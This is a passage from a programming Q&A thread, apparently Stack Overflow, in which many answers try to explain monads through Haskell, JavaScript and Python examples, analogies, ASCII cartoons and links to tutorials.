(ma >>= k) = do { a <- ma ; b <- k a ; return b }
A: After much striving, I think I finally understand the monad. After rereading my own lengthy critique of the overwhelmingly top voted answer, I will offer this explanation.
There are three questions that need to be answered to understand monads:
*
*Why do you need a monad?
*What is a monad?
*How is a monad implemented?
As I noted in my original comments, too many monad explanations get caught up in question number 3, without, and before really adequately covering question 2, or question 1.
Why do you need a monad?
Pure functional languages like Haskell are different from imperative languages like C, or Java in that, a pure functional program is not necessarily executed in a specific order, one step at a time. A Haskell program is more akin to a mathematical function, in which you may solve the "equation" in any number of potential orders. This confers a number of benefits, among which is that it eliminates the possibility of certain kinds of bugs, particularly those relating to things like "state".
However, there are certain problems that are not so straightforward to solve with this style of programming. Some things, like console programming, and file i/o, need things to happen in a particular order, or need to maintain state. One way to deal with this problem is to create a kind of object that represents the state of a computation, and a series of functions that take a state object as input, and return a new modified state object.
So let's create a hypothetical "state" value, that represents the state of a console screen. exactly how this value is constructed is not important, but let's say it's an array of byte length ascii characters that represents what is currently visible on the screen, and an array that represents the last line of input entered by the user, in pseudocode. We've defined some functions that take console state, modify it, and return a new console state.
consolestate MyConsole = new consolestate;
So to do console programming, but in a pure functional manner, you would need to nest a lot of function calls inside eachother.
consolestate FinalConsole = print(input(print(myconsole, "Hello, what's your name?")),"hello, %inputbuffer%!");
Programming in this way keeps the "pure" functional style, while forcing changes to the console to happen in a particular order. But, we'll probably want to do more than just a few operations at a time like in the above example. Nesting functions in that way will start to become ungainly. What we want, is code that does essentially the same thing as above, but is written a bit more like this:
consolestate FinalConsole = myconsole:
print("Hello, what's your name?"):
input():
print("hello, %inputbuffer%!");
This would indeed be a more convenient way to write it. How do we do that though?
What is a monad?
Once you have a type (such as consolestate) that you define along with a bunch of functions designed specifically to operate on that type, you can turn the whole package of these things into a "monad" by defining an operator like : (bind) that automatically feeds return values on its left, into function parameters on its right, and a lift operator that turns normal functions, into functions that work with that specific kind of bind operator.
How is a monad implemented?
See other answers, that seem quite free to jump into the details of that.
A: After giving an answer to this question a few years ago, I believe I can improve and simplify that response with...
A monad is a function composition technique that externalizes treatment for some input scenarios using a composing function, bind, to pre-process input during composition.
In normal composition, the function, compose (>>), is use to apply the composed function to the result of its predecessor in sequence. Importantly, the function being composed is required to handle all scenarios of its input.
(x -> y) >> (y -> z)
This design can be improved by restructuring the input so that relevant states are more easily interrogated. So, instead of simply y the value can become Mb such as, for instance, (is_OK, b) if y included a notion of validity.
For example, when the input is only possibly a number, instead of returning a string which can dutifully contain a number or not, you could restructure the type into a bool indicating the presence of a valid number and a number in tuple such as, bool * float. The composed functions would now no longer need to parse an input string to determine whether a number exists but could merely inspect the bool portion of a tuple.
(Ma -> Mb) >> (Mb -> Mc)
Here, again, composition occurs naturally with compose and so each function must handle all scenarios of its input individually, though doing so is now much easier.
However, what if we could externalize the effort of interrogation for those times where handling a scenario is routine. For example, what if our program does nothing when the input is not OK as in when is_OK is false. If that were done then composed functions would not need to handle that scenario themselves, dramatically simplifying their code and effecting another level of reuse.
To achieve this externalization we could use a function, bind (>>=), to perform the composition instead of compose. As such, instead of simply transferring values from the output of one function to the input of another Bind would inspect the M portion of Ma and decide whether and how to apply the composed function to the a. Of course, the function bind would be defined specifically for our particular M so as to be able to inspect its structure and perform whatever type of application we want. Nonetheless, the a can be anything since bind merely passes the a uninspected to the the composed function when it determines application necessary. Additionally, the composed functions themselves no longer need to deal with the M portion of the input structure either, simplifying them. Hence...
(a -> Mb) >>= (b -> Mc) or more succinctly Mb >>= (b -> Mc)
In short, a monad externalizes and thereby provides standard behaviour around the treatment of certain input scenarios once the input becomes designed to sufficiently expose them. This design is a shell and content model where the shell contains data relevant to the application of the composed function and is interrogated by and remains only available to the bind function.
Therefore, a monad is three things:
*
*an M shell for holding monad relevant information,
*a bind function implemented to make use of this shell information in its application of the composed functions to the content value(s) it finds within the shell, and
*composable functions of the form, a -> Mb, producing results that include monadic management data.
Generally speaking, the input to a function is far more restrictive than its output which may include such things as error conditions; hence, the Mb result structure is generally very useful. For instance, the division operator does not return a number when the divisor is 0.
Additionally, monads may include wrap functions that wrap values, a, into the monadic type, Ma, and general functions, a -> b, into monadic functions, a -> Mb, by wrapping their results after application. Of course, like bind, such wrap functions are specific to M. An example:
let return a = [a]
let lift f a = return (f a)
The design of the bind function presumes immutable data structures and pure functions others things get complex and guarantees cannot be made. As such, there are monadic laws:
Given...
M_
return = (a -> Ma)
f = (a -> Mb)
g = (b -> Mc)
Then...
Left Identity : (return a) >>= f === f a
Right Identity : Ma >>= return === Ma
Associative : Ma >>= (f >>= g) === Ma >>= ((fun x -> f x) >>= g)
Associativity means that bind preserves the order of evaluation regardless of when bind is applied. That is, in the definition of Associativity above, the force early evaluation of the parenthesized binding of f and g will only result in a function that expects Ma in order to complete the bind. Hence the evaluation of Ma must be determined before its value can become applied to f and that result in turn applied to g.
A: If I've understood correctly, IEnumerable is derived from monads. I wonder if that might be an interesting angle of approach for those of us from the C# world?
For what it's worth, here are some links to tutorials that helped me (and no, I still haven't understood what monads are).
*
*http://osteele.com/archives/2007/12/overloading-semicolon
*http://spbhug.folding-maps.org/wiki/MonadsEn
*http://www.loria.fr/~kow/monads/
A: http://code.google.com/p/monad-tutorial/ is a work in progress to address exactly this question.
A: What the world needs is another monad blog post, but I think this is useful in identifying existing monads in the wild.
*
*monads are fractals
The above is a fractal called Sierpinski triangle, the only fractal I can remember to draw. Fractals are self-similar structure like the above triangle, in which the parts are similar to the whole (in this case exactly half the scale as parent triangle).
Monads are fractals. Given a monadic data structure, its values can be composed to form another value of the data structure. This is why it's useful to programming, and this is why it occurrs in many situations.
A: A monad is a container, but for data. A special container.
All containers can have openings and handles and spouts, but these containers are all guaranteed to have certain openings and handles and spouts.
Why? Because these guaranteed openings and handles and spouts are useful for picking up and linking together the containers in specific, common ways.
This allows you to pick up different containers without having to know much about them. It also allows different kinds of containers to link together easily.
A: A monad is, effectively, a form of "type operator". It will do three things. First it will "wrap" (or otherwise convert) a value of one type into another type (typically called a "monadic type"). Secondly it will make all the operations (or functions) available on the underlying type available on the monadic type. Finally it will provide support for combining its self with another monad to produce a composite monad.
The "maybe monad" is essentially the equivalent of "nullable types" in Visual Basic / C#. It takes a non nullable type "T" and converts it into a "Nullable<T>", and then defines what all the binary operators mean on a Nullable<T>.
Side effects are represented simillarly. A structure is created that holds descriptions of side effects alongside a function's return value. The "lifted" operations then copy around side effects as values are passed between functions.
They are called "monads" rather than the easier-to-grasp name of "type operators" for several reasons:
*
*Monads have restrictions on what they can do (see the definiton for details).
*Those restrictions, along with the fact that there are three operations involved, conform to the structure of something called a monad in Category Theory, which is an obscure branch of mathematics.
*They were designed by proponents of "pure" functional languages
*Proponents of pure functional languages like obscure branches of mathematics
*Because the math is obscure, and monads are associated with particular styles of programming, people tend to use the word monad as a sort of secret handshake. Because of this no one has bothered to invest in a better name.
A: (See also the answers at What is a monad?)
A good motivation to Monads is sigfpe (Dan Piponi)'s You Could Have Invented Monads! (And Maybe You Already Have). There are a LOT of other monad tutorials, many of which misguidedly try to explain monads in "simple terms" using various analogies: this is the monad tutorial fallacy; avoid them.
As DR MacIver says in Tell us why your language sucks:
So, things I hate about Haskell:
Let’s start with the obvious. Monad tutorials. No, not monads. Specifically the tutorials. They’re endless, overblown and dear god are they tedious. Further, I’ve never seen any convincing evidence that they actually help. Read the class definition, write some code, get over the scary name.
You say you understand the Maybe monad? Good, you're on your way. Just start using other monads and sooner or later you'll understand what monads are in general.
[If you are mathematically oriented, you might want to ignore the dozens of tutorials and learn the definition, or follow lectures in category theory :)
The main part of the definition is that a Monad M involves a "type constructor" that defines for each existing type "T" a new type "M T", and some ways for going back and forth between "regular" types and "M" types.]
Also, surprisingly enough, one of the best introductions to monads is actually one of the early academic papers introducing monads, Philip Wadler's Monads for functional programming. It actually has practical, non-trivial motivating examples, unlike many of the artificial tutorials out there.
A: A very simple answer is:
Monads are an abstraction that provide an interface for encapsulating values, for computing new encapsulated values, and for unwrapping the encapsulated value.
What's convenient about them in practice is that they provide a uniform interface for creating data types that model state while not being stateful.
It's important to understand that a Monad is an abstraction, that is, an abstract interface for dealing with a certain kind of data structure. That interface is then used to build data types that have monadic behavior.
You can find a very good and practical introduction in Monads in Ruby, Part 1: Introduction.
A: Let the below "{| a |m}" represent some piece of monadic data. A data type which advertises an a:
(I got an a!)
/
{| a |m}
Function, f, knows how to create a monad, if only it had an a:
(Hi f! What should I be?)
/
(You?. Oh, you'll be /
that data there.) /
/ / (I got a b.)
| -------------- |
| / |
f a |
|--later-> {| b |m}
Here we see function, f, tries to evaluate a monad but gets rebuked.
(Hmm, how do I get that a?)
o (Get lost buddy.
o Wrong type.)
o /
f {| a |m}
Funtion, f, finds a way to extract the a by using >>=.
(Muaahaha. How you
like me now!?)
(Better.) \
| (Give me that a.)
(Fine, well ok.) |
\ |
{| a |m} >>= f
Little does f know, the monad and >>= are in collusion.
(Yah got an a for me?)
(Yeah, but hey |
listen. I got |
something to |
tell you first |
...) \ /
| /
{| a |m} >>= f
But what do they actually talk about? Well, that depends on the monad. Talking solely in the abstract has limited use; you have to have some experience with particular monads to flesh out the understanding.
For instance, the data type Maybe
data Maybe a = Nothing | Just a
has a monad instance which will acts like the following...
Wherein, if the case is Just a
(Yah what is it?)
(... hm? Oh, |
forget about it. |
Hey a, yr up.) |
\ |
(Evaluation \ |
time already? \ |
Hows my hair?) | |
| / |
| (It's |
| fine.) /
| / /
{| a |m} >>= f
But for the case of Nothing
(Yah what is it?)
(... There |
is no a. ) |
| (No a?)
(No a.) |
| (Ok, I'll deal
| with this.)
\ |
\ (Hey f, get lost.)
\ | ( Where's my a?
\ | I evaluate a)
\ (Not any more |
\ you don't. |
| We're returning
| Nothing.) /
| | /
| | /
| | /
{| a |m} >>= f (I got a b.)
| (This is \
| such a \
| sham.) o o \
| o|
|--later-> {| b |m}
So the Maybe monad lets a computation continue if it actually contains the a it advertises, but aborts the computation if it doesn't. The result, however is still a piece of monadic data, though not the output of f. For this reason, the Maybe monad is used to represent the context of failure.
Different monads behave differently. Lists are other types of data with monadic instances. They behave like the following:
(Ok, here's your a. Well, its
a bunch of them, actually.)
|
| (Thanks, no problem. Ok
| f, here you go, an a.)
| |
| | (Thank's. See
| | you later.)
| (Whoa. Hold up f, |
| I got another |
| a for you.) |
| | (What? No, sorry.
| | Can't do it. I
| | have my hands full
| | with all these "b"
| | I just made.)
| (I'll hold those, |
| you take this, and /
| come back for more /
| when you're done /
| and we'll do it /
| again.) /
\ | ( Uhhh. All right.)
\ | /
\ \ /
{| a |m} >>= f
In this case, the function knew how to make a list from it's input, but didn't know what to do with extra input and extra lists. The bind >>=, helped f out by combining the multiple outputs. I include this example to show that while >>= is responsible for extracting a, it also has access to the eventual bound output of f. Indeed, it will never extract any a unless it knows the eventual output has the same type of context.
There are other monads which are used to represent different contexts. Here's some characterizations of a few more. The IO monad doesn't actually have an a, but it knows a guy and will get that a for you. The State st monad has a secret stash of st that it will pass to f under the table, even though f just came asking for an a. The Reader r monad is similar to State st, although it only lets f look at r.
The point in all this is that any type of data which is declared itself to be a Monad is declaring some sort of context around extracting a value from the monad. The big gain from all this? Well, its easy enough to couch a calculation with some sort of context. It can get messy, however, when stringing together multiple context laden calculations. The monad operations take care of resolving the interactions of context so that the programmer doesn't have to.
Note, that use of the >>= eases a mess by by taking some of the autonomy away from f. That is, in the above case of Nothing for instance, f no longer gets to decide what to do in the case of Nothing; it's encoded in >>=. This is the trade off. If it was necessary for f to decide what to do in the case of Nothing, then f should have been a function from Maybe a to Maybe b. In this case, Maybe being a monad is irrelevant.
Note, however, that sometimes a data type does not export it's constructors (looking at you IO), and if we want to work with the advertised value we have little choice but to work with it's monadic interface.
A: Monads are to control flow what abstract data types are to data.
In other words, many developers are comfortable with the idea of Sets, Lists, Dictionaries (or Hashes, or Maps), and Trees. Within those data types there are many special cases (for instance InsertionOrderPreservingIdentityHashMap).
However, when confronted with program "flow" many developers haven't been exposed to many more constructs than if, switch/case, do, while, goto (grr), and (maybe) closures.
So, a monad is simply a control flow construct. A better phrase to replace monad would be 'control type'.
As such, a monad has slots for control logic, or statements, or functions - the equivalent in data structures would be to say that some data structures allow you to add data, and remove it.
For example, the "if" monad:
if( clause ) then block
at its simplest has two slots - a clause, and a block. The if monad is usually built to evaluate the result of the clause, and if not false, evaluate the block. Many developers are not introduced to monads when they learn 'if', and it just isn't necessary to understand monads to write effective logic.
Monads can become more complicated, in the same way that data structures can become more complicated, but there are many broad categories of monad that may have similar semantics, but differing implementations and syntax.
Of course, in the same way that data structures may be iterated over, or traversed, monads may be evaluated.
Compilers may or may not have support for user-defined monads. Haskell certainly does. Ioke has some similar capabilities, although the term monad is not used in the language.
A: Actually, contrary to common understanding of Monads, they have nothing to do with state. Monads are simply a way to wrapping things and provide methods to do operations on the wrapped stuff without unwrapping it.
For example, you can create a type to wrap another one, in Haskell:
data Wrapped a = Wrap a
To wrap stuff we define
return :: a -> Wrapped a
return x = Wrap x
To perform operations without unwrapping, say you have a function f :: a -> b, then you can do this to lift that function to act on wrapped values:
fmap :: (a -> b) -> (Wrapped a -> Wrapped b)
fmap f (Wrap x) = Wrap (f x)
That's about all there is to understand. However, it turns out that there is a more general function to do this lifting, which is bind:
bind :: (a -> Wrapped b) -> (Wrapped a -> Wrapped b)
bind f (Wrap x) = f x
bind can do a bit more than fmap, but not vice versa. Actually, fmap can be defined only in terms of bind and return. So, when defining a monad.. you give its type (here it was Wrapped a) and then say how its return and bind operations work.
The cool thing is that this turns out to be such a general pattern that it pops up all over the place, encapsulating state in a pure way is only one of them.
For a good article on how monads can be used to introduce functional dependencies and thus control order of evaluation, like it is used in Haskell's IO monad, check out IO Inside.
As for understanding monads, don't worry too much about it. Read about them what you find interesting and don't worry if you don't understand right away. Then just diving in a language like Haskell is the way to go. Monads are one of these things where understanding trickles into your brain by practice, one day you just suddenly realize you understand them.
A: A monad is a thing used to encapsulate objects that have changing state. It is most often encountered in languages that otherwise do not allow you to have modifiable state (e.g., Haskell).
An example would be for file I/O.
You would be able to use a monad for file I/O to isolate the changing state nature to just the code that used the Monad. The code inside the Monad can effectively ignore the changing state of the world outside the Monad - this makes it a lot easier to reason about the overall effect of your program.
A: Princess's explanation of F# Computation Expressions helped me, though I still can't say I've really understood.
EDIT: this series - explaining monads with javascript - is the one that 'tipped the balance' for me.
*
*http://blog.jcoglan.com/2011/03/05/translation-from-haskell-to-javascript-of-selected-portions-of-the-best-introduction-to-monads-ive-ever-read/
*http://blog.jcoglan.com/2011/03/06/monad-syntax-for-javascript/
*http://blog.jcoglan.com/2011/03/11/promises-are-the-monad-of-asynchronous-programming/
I think that understanding monads is something that creeps up on you. In that sense, reading as many 'tutorials' as you can is a good idea, but often strange stuff (unfamiliar language or syntax) prevents your brain from concentrating on the essential.
Some things that I had difficulty understanding:
*
*Rules-based explanations never worked for me, because most practical examples actually require more than just return/bind.
*Also, calling them rules didn't help. It is more a case of "there are these things that have something in common, let's call the things 'monads', and the bits in common 'rules'".
*Return (a -> M<a>) and Bind (M<a> -> (a -> M<b>) -> M<b>) are great, but what I could never understand is HOW Bind could extract the a from M<a> in order to pass it into a -> M<b>. I don't think I've ever read anywhere (maybe it's obvious to everyone else), that the reverse of Return (M<a> -> a) has to exist inside the monad, it just doesn't need to be exposed.
A: Explaining monads seems to be like explaining control-flow statements. Imagine that a non-programmer asks you to explain them?
You can give them an explanation involving the theory - Boolean Logic, register values, pointers, stacks, and frames. But that would be crazy.
You could explain them in terms of the syntax. Basically all control-flow statements in C have curly brackets, and you can distinguish the condition and the conditional code by where they are relative to the brackets. That may be even crazier.
Or you could also explain loops, if statements, routines, subroutines, and possibly co-routines.
Monads can replace a fairly large number of programming techniques. There's a specific syntax in languages that support them, and some theories about them.
They are also a way for functional programmers to use imperative code without actually admitting it, but that's not their only use.
A: I'm trying to understand monads as well. It's my version:
Monads are about making abstractions about repetitive things.
Firstly, monad itself is a typed interface (like an abstract generic class), that has two functions: bind and return that have defined signatures. And then, we can create concrete monads based on that abstract monad, of course with specific implementations of bind and return. Additionally, bind and return must fulfill a few invariants in order to make it possible to compose/chain concrete monads.
Why create the monad concept while we have interfaces, types, classes and other tools to create abstractions? Because monads give more: they enforce rethinking problems in a way that enables to compose data without any boilerplate.
A: Essentially, and Practically, monads allow callback nesting
(with a mutually-recursively-threaded state (pardon the hyphens))
(in a composable (or decomposable) fashion)
(with type safety (sometimes (depending on the language)))
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
E.G. this is NOT a monad:
//JavaScript is 'Practical'
var getAllThree =
bind(getFirst, function(first){
return bind(getSecond,function(second){
return bind(getThird, function(third){
var fancyResult = // And now make do fancy
// with first, second,
// and third
return RETURN(fancyResult);
});});});
But monads enable such code.
The monad is actually the set of types for:
{bind,RETURN,maybe others I don't know...}.
Which is essentially inessential, and practically impractical.
So now I can use it:
var fancyResultReferenceOutsideOfMonad =
getAllThree(someKindOfInputAcceptableToOurGetFunctionsButProbablyAString);
//Ignore this please, throwing away types, yay JavaScript:
// RETURN = K
// bind = \getterFn,cb ->
// \in -> let(result,newState) = getterFn(in) in cb(result)(newState)
Or Break it up:
var getFirstTwo =
bind(getFirst, function(first){
return bind(getSecond,function(second){
var fancyResult2 = // And now make do fancy
// with first and second
return RETURN(fancyResult2);
});})
, getAllThree =
bind(getFirstTwo, function(fancyResult2){
return bind(getThird, function(third){
var fancyResult3 = // And now make do fancy
// with fancyResult2,
// and third
return RETURN(fancyResult3);
});});
Or ignore certain results:
var getFirstTwo =
bind(getFirst, function(first){
return bind(getSecond,function(second){
var fancyResult2 = // And now make do fancy
// with first and second
return RETURN(fancyResult2);
});})
, getAllThree =
bind(getFirstTwo, function(____dontCare____NotGonnaUse____){
return bind(getThird, function(three){
var fancyResult3 = // And now make do fancy
// with `three` only!
return RETURN(fancyResult3);
});});
Or simplify a trivial case from:
var getFirstTwo =
bind(getFirst, function(first){
return bind(getSecond,function(second){
var fancyResult2 = // And now make do fancy
// with first and second
return RETURN(fancyResult2);
});})
, getAllThree =
bind(getFirstTwo, function(_){
return bind(getThird, function(three){
return RETURN(three);
});});
To (using "Right Identity"):
var getFirstTwo =
bind(getFirst, function(first){
return bind(getSecond,function(second){
var fancyResult2 = // And now make do fancy
// with first and second
return RETURN(fancyResult2);
});})
, getAllThree =
bind(getFirstTwo, function(_){
return getThird;
});
Or jam them back together:
var getAllThree =
bind(getFirst, function(first_dontCareNow){
return bind(getSecond,function(second_dontCareNow){
return getThird;
});});
The practicality of these abilities doesn't really emerge,
or become clear until you try to solve really messy problems
like parsing, or module/ajax/resource loading.
Can you imagine thousands of lines of indexOf/subString logic?
What if frequent parsing steps were contained in little functions?
Functions like chars, spaces,upperChars, or digits?
And what if those functions gave you the result in a callback,
without having to mess with Regex groups, and arguments.slice?
And what if their composition/decomposition was well understood?
Such that you could build big parsers from the bottom up?
So the ability to manage nested callback scopes is incredibly practical,
especially when working with monadic parser combinator libraries.
(that is to say, in my experience)
DON'T GET HUNG UP ON:
- CATEGORY-THEORY
- MAYBE-MONADS
- MONAD LAWS
- HASKELL
- !!!!
A: Another attempt at explaining monads, using just Python lists and the map function. I fully accept this isn't a full explanation, but I hope it gets at the core concepts.
I got the basis of this from the funfunfunction video on Monads and the Learn You A Haskell chapter 'For a Few Monads More'. I highly recommend watching the funfunfunction video.
At it's very simplest, Monads are objects that have a map and flatMap functions (bind in Haskell). There are some extra required properties, but these are the core ones.
flatMap 'flattens' the output of map, for lists this just concatenates the values of the list e.g.
concat([[1], [4], [9]]) = [1, 4, 9]
So in Python we can very basically implement a Monad with just these two functions:
def flatMap(func, lst):
return concat(map(func, lst))
def concat(lst):
return sum(lst, [])
func is any function that takes a value and returns a list e.g.
lambda x: [x*x]
Explanation
For clarity I created the concat function in Python via a simple function, which sums the lists i.e. [] + [1] + [4] + [9] = [1, 4, 9] (Haskell has a native concat method).
I'm assuming you know what the map function is e.g.:
>>> list(map(lambda x: [x*x], [1,2,3]))
[[1], [4], [9]]
Flattening is the key concept of Monads and for each object which is a Monad this flattening allows you to get at the value that is wrapped in the Monad.
Now we can call:
>>> flatMap(lambda x: [x*x], [1,2,3])
[1, 4, 9]
This lambda is taking a value x and putting it into a list. A monad works with any function that goes from a value to a type of the monad, so a list in this case.
That's your monad defined.
I think the question of why they're useful has been answered in other questions.
More explanation
Other examples that aren't lists are JavaScript Promises, which have the then method and JavaScript Streams which have a flatMap method.
So Promises and Streams use a slightly different function which flattens out a Stream or a Promise and returns the value from within.
The Haskell list monad has the following definition:
instance Monad [] where
return x = [x]
xs >>= f = concat (map f xs)
fail _ = []
i.e. there are three functions return (not to be confused with return in most other languages), >>= (the flatMap) and fail.
Hopefully you can see the similarity between:
xs >>= f = concat (map f xs)
and:
def flatMap(f, xs):
return concat(map(f, xs))
A: But, You could have invented Monads!
sigfpe says:
But all of these introduce monads as something esoteric in need of explanation. But what I want to argue is that they aren't esoteric at all. In fact, faced with various problems in functional programming you would have been led, inexorably, to certain solutions, all of which are examples of monads. In fact, I hope to get you to invent them now if you haven't already. It's then a small step to notice that all of these solutions are in fact the same solution in disguise. And after reading this, you might be in a better position to understand other documents on monads because you'll recognise everything you see as something you've already invented.
Many of the problems that monads try to solve are related to the issue of side effects. So we'll start with them. (Note that monads let you do more than handle side-effects, in particular many types of container object can be viewed as monads. Some of the introductions to monads find it hard to reconcile these two different uses of monads and concentrate on just one or the other.)
In an imperative programming language such as C++, functions behave nothing like the functions of mathematics. For example, suppose we have a C++ function that takes a single floating point argument and returns a floating point result. Superficially it might seem a little like a mathematical function mapping reals to reals, but a C++ function can do more than just return a number that depends on its arguments. It can read and write the values of global variables as well as writing output to the screen and receiving input from the user. In a pure functional language, however, a function can only read what is supplied to it in its arguments and the only way it can have an effect on the world is through the values it returns.
A: My favorite Monad tutorial:
http://www.haskell.org/haskellwiki/All_About_Monads
(out of 170,000 hits on a Google search for "monad tutorial"!)
@Stu: The point of monads is to allow you to add (usually) sequential semantics to otherwise pure code; you can even compose monads (using Monad Transformers) and get more interesting and complicated combined semantics, like parsing with error handling, shared state, and logging, for example. All of this is possible in pure code, monads just allow you to abstract it away and reuse it in modular libraries (always good in programming), as well as providing convenient syntax to make it look imperative.
Haskell already has operator overloading[1]: it uses type classes much the way one might use interfaces in Java or C# but Haskell just happens to also allow non-alphanumeric tokens like + && and > as infix identifiers. It's only operator overloading in your way of looking at it if you mean "overloading the semicolon" [2]. It sounds like black magic and asking for trouble to "overload the semicolon" (picture enterprising Perl hackers getting wind of this idea) but the point is that without monads there is no semicolon, since purely functional code does not require or allow explicit sequencing.
This all sounds much more complicated than it needs to. sigfpe's article is pretty cool but uses Haskell to explain it, which sort of fails to break the chicken and egg problem of understanding Haskell to grok Monads and understanding Monads to grok Haskell.
[1] This is a separate issue from monads but monads use Haskell's operator overloading feature.
[2] This is also an oversimplification since the operator for chaining monadic actions is >>= (pronounced "bind") but there is syntactic sugar ("do") that lets you use braces and semicolons and/or indentation and newlines.
A: First: The term monad is a bit vacuous if you are not a mathematician. An alternative term is computation builder which is a bit more descriptive of what they are actually useful for.
They are a pattern for chaining operations. It looks a bit like method chaining in object-oriented languages, but the mechanism is slightly different.
The pattern is mostly used in functional languages (especially Haskell which uses monads pervasively) but can be used in any language which support higher-order functions (that is, functions which can take other functions as arguments).
Arrays in JavaScript support the pattern, so let’s use that as the first example.
The gist of the pattern is we have a type (Array in this case) which has a method which takes a function as argument. The operation supplied must return an instance of the same type (i.e. return an Array).
First an example of method chaining which does not use the monad pattern:
[1,2,3].map(x => x + 1)
The result is [2,3,4]. The code does not conform to the monad pattern, since the function we are supplying as an argument returns a number, not an Array. The same logic in monad form would be:
[1,2,3].flatMap(x => [x + 1])
Here we supply an operation which returns an Array, so now it conforms to the pattern. The flatMap method executes the provided function for every element in the array. It expects an array as result for each invocation (rather than single values), but merges the resulting set of arrays into a single array. So the end result is the same, the array [2,3,4].
(The function argument provided to a method like map or flatMap is often called a "callback" in JavaScript. I will call it the "operation" since it is more general.)
If we chain multiple operations (in the traditional way):
[1,2,3].map(a => a + 1).filter(b => b != 3)
Results in the array [2,4]
The same chaining in monad form:
[1,2,3].flatMap(a => [a + 1]).flatMap(b => b != 3 ? [b] : [])
Yields the same result, the array [2,4].
You will immediately notice that the monad form is quite a bit uglier than the non-monad! This just goes to show that monads are not necessarily “good”. They are a pattern which is sometimes beneficial and sometimes not.
Do note that the monad pattern can be combined in a different way:
[1,2,3].flatMap(a => [a + 1].flatMap(b => b != 3 ? [b] : []))
Here the binding is nested rather than chained, but the result is the same. This is an important property of monads as we will see later. It means two operations combined can be treated the same as a single operation.
The operation is allowed to return an array with different element types, for example transforming an array of numbers into an array of strings or something else; as long as it still an Array.
This can be described a bit more formally using Typescript notation. An array has the type Array<T>, where T is the type of the elements in the array. The method flatMap() takes a function argument of the type T => Array<U> and returns an Array<U>.
Generalized, a monad is any type Foo<Bar> which has a "bind" method which takes a function argument of type Bar => Foo<Baz> and returns a Foo<Baz>.
This answers what monads are. The rest of this answer will try to explain through examples why monads can be a useful pattern in a language like Haskell which has good support for them.
Haskell and Do-notation
To translate the map/filter example directly to Haskell, we replace flatMap with the >>= operator:
[1,2,3] >>= \a -> [a+1] >>= \b -> if b == 3 then [] else [b]
The >>= operator is the bind function in Haskell. It does the same as flatMap in JavaScript when the operand is a list, but it is overloaded with different meaning for other types.
But Haskell also has a dedicated syntax for monad expressions, the do-block, which hides the bind operator altogether:
do
a <- [1,2,3]
b <- [a+1]
if b == 3 then [] else [b]
This hides the "plumbing" and lets you focus on the actual operations applied at each step.
In a do-block, each line is an operation. The constraint still holds that all operations in the block must return the same type. Since the first expression is a list, the other operations must also return a list.
The back-arrow <- looks deceptively like an assignment, but note that this is the parameter passed in the bind. So, when the expression on the right side is a List of Integers, the variable on the left side will be a single Integer – but will be executed for each integer in the list.
Example: Safe navigation (the Maybe type)
Enough about lists, lets see how the monad pattern can be useful for other types.
Some functions may not always return a valid value. In Haskell this is represented by the Maybe-type, which is an option that is either Just value or Nothing.
Chaining operations which always return a valid value is of course straightforward:
streetName = getStreetName (getAddress (getUser 17))
But what if any of the functions could return Nothing? We need to check each result individually and only pass the value to the next function if it is not Nothing:
case getUser 17 of
Nothing -> Nothing
Just user ->
case getAddress user of
Nothing -> Nothing
Just address ->
getStreetName address
Quite a lot of repetitive checks! Imagine if the chain was longer. Haskell solves this with the monad pattern for Maybe:
do
user <- getUser 17
addr <- getAddress user
getStreetName addr
This do-block invokes the bind-function for the Maybe type (since the result of the first expression is a Maybe). The bind-function only executes the following operation if the value is Just value, otherwise it just passes the Nothing along.
Here the monad-pattern is used to avoid repetitive code. This is similar to how some other languages use macros to simplify syntax, although macros achieve the same goal in a very different way.
Note that it is the combination of the monad pattern and the monad-friendly syntax in Haskell which result in the cleaner code. In a language like JavaScript without any special syntax support for monads, I doubt the monad pattern would be able to simplify the code in this case.
Mutable state
Haskell does not support mutable state. All variables are constants and all values immutable. But the State type can be used to emulate programming with mutable state:
add2 :: State Integer Integer
add2 = do
-- add 1 to state
x <- get
put (x + 1)
-- increment in another way
modify (+1)
-- return state
get
evalState add2 7
=> 9
The add2 function builds a monad chain which is then evaluated with 7 as the initial state.
Obviously this is something which only makes sense in Haskell. Other languages support mutable state out of the box. Haskell is generally "opt-in" on language features - you enable mutable state when you need it, and the type system ensures the effect is explicit. IO is another example of this.
IO
The IO type is used for chaining and executing “impure” functions.
Like any other practical language, Haskell has a bunch of built-in functions which interface with the outside world: putStrLine, readLine and so on. These functions are called “impure” because they either cause side effects or have non-deterministic results. Even something simple like getting the time is considered impure because the result is non-deterministic – calling it twice with the same arguments may return different values.
A pure function is deterministic – its result depends purely on the arguments passed and it has no side effects on the environment beside returning a value.
Haskell heavily encourages the use of pure functions – this is a major selling point of the language. Unfortunately for purists, you need some impure functions to do anything useful. The Haskell compromise is to cleanly separate pure and impure, and guarantee that there is no way that pure functions can execute impure functions, directly or indirect.
This is guaranteed by giving all impure functions the IO type. The entry point in Haskell program is the main function which have the IO type, so we can execute impure functions at the top level.
But how does the language prevent pure functions from executing impure functions? This is due to the lazy nature of Haskell. A function is only executed if its output is consumed by some other function. But there is no way to consume an IO value except to assign it to main. So if a function wants to execute an impure function, it has to be connected to main and have the IO type.
Using monad chaining for IO operations also ensures that they are executed in a linear and predictable order, just like statements in an imperative language.
This brings us to the first program most people will write in Haskell:
main :: IO ()
main = do
putStrLn ”Hello World”
The do keyword is superfluous when there is only a single operation and therefore nothing to bind, but I keep it anyway for consistency.
The () type means “void”. This special return type is only useful for IO functions called for their side effect.
A longer example:
main = do
putStrLn "What is your name?"
name <- getLine
putStrLn ("hello" ++ name)
This builds a chain of IO operations, and since they are assigned to the main function, they get executed.
Comparing IO with Maybe shows the versatility of the monad pattern. For Maybe, the pattern is used to avoid repetitive code by moving conditional logic to the binding function. For IO, the pattern is used to ensure that all operations of the IO type are sequenced and that IO operations cannot "leak" to pure functions.
Summing up
In my subjective opinion, the monad pattern is only really worthwhile in a language which has some built-in support for the pattern. Otherwise it just leads to overly convoluted code. But Haskell (and some other languages) have some built-in support which hides the tedious parts, and then the pattern can be used for a variety of useful things. Like:
*
*Avoiding repetitive code (Maybe)
*Adding language features like mutable state or exceptions for delimited areas of the program.
*Isolating icky stuff from nice stuff (IO)
*Embedded domain-specific languages (Parser)
*Adding GOTO to the language.
A: I am still new to monads, but I thought I would share a link I found that felt really good to read (WITH PICTURES!!):
http://www.matusiak.eu/numerodix/blog/2012/3/11/monads-for-the-layman/
(no affiliation)
